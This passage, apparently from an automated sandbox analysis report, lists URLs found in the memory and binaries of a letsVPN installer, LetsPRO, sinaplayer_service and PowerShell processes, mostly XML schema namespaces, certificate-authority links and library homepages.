              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: sinaplayer_service.exeString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=
              Source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=htt
              Source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://rcd.video.sina.com.cn/realtime_pcdesktopcrash_checkpoint.txtmax-reportsno-windowreporterdumps
              Source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.fontawesome.io/icons/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/claims/EmailAddressNhttp://schemas.xmlsoap.org/claims/GroupJhttp://schema
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressingzhttp://docs.oasis-open.org/ws-sx/ws-secureconversat
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/mex
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/transfer/Getthttp://schemas.xmlsoap.org/ws/2004/09/transfer/Ge
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scXhttp://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/CancelT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuelhttp://schemas.xmlsoap.org/ws/2005/02/trust/RS
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/ValidateT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancel
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/CancelT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelmhttp://schemas.xmlsoap.org/ws/2005/02/trust/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Renew
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/RenewT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTwhttp://schemas.xmlsoap.org/ws/2005/02/trust/RST
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validate
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateT
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateehttp://schemas.xmlsoap.org/ws/2005/02/trus
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateq
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/ws-trust.xsd
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/attributename
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/displayname
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/format
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/namequalifier
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/spnamequalifier
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/spprovidedid
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/country
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirth
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsshttp://schemas.xmlsoap.org/ws/2005/05/iden
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/gender
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/homephone
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2590832104.0000000004721000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcode
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifier
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierrhttp://schemas.xmlso
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/sid
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddress#StreetAddressText
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprint
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/urishttp://schemas.xmlsoap.org/ws/2005/05/iden
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpage
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname_urn:oasis:names:tc:xacml
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2007/01/identity
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2009/09/identity/claims/actor
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
              Source: letsVPN.exe, 00000000.00000003.2184550370.0000000004201000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2382422966.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2541164206.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2530969091.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2490411396.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2449881395.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: letsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://web.singnet.com.sg/~rendsoft
              Source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://wpfanimatedgif.codeplex.com
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: letsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.atomixbuttons.com
              Source: letsVPN.exe, 00000000.00000002.2240005982.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2132205568.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.atomixbuttons.com/textcalc
              Source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: letsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hardcodet.net/taskbar
              Source: sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.winimage.com/zLibDll-1.2.5U(L
              Source: sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.winimage.com/zLibDllnetwork_change
              Source: letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xmlspy.com)
